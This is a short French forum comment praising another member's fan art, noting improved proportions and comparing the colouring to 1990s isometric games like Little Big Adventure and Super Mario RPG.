C'est cool de foir tes fanart Ari. En plus je me souviens qu'avant je pouvais faire quelques critiques sur les proportions ou deux trois petits trucs du genre mais franchement depuis c'est nickel.

Et ta colo est super classe. Un peu effet 3D isométrique des années 90 de jeux comme Little Big Adventure ou Super Mario RPG (donc j'adore).
nathéo - Genin - Profil - 02/04/2020 à 19:30 Online
"Le jus de la vigne clarifie l'esprit et l'entendement."

Pages: [ 1 ] Page Suivante >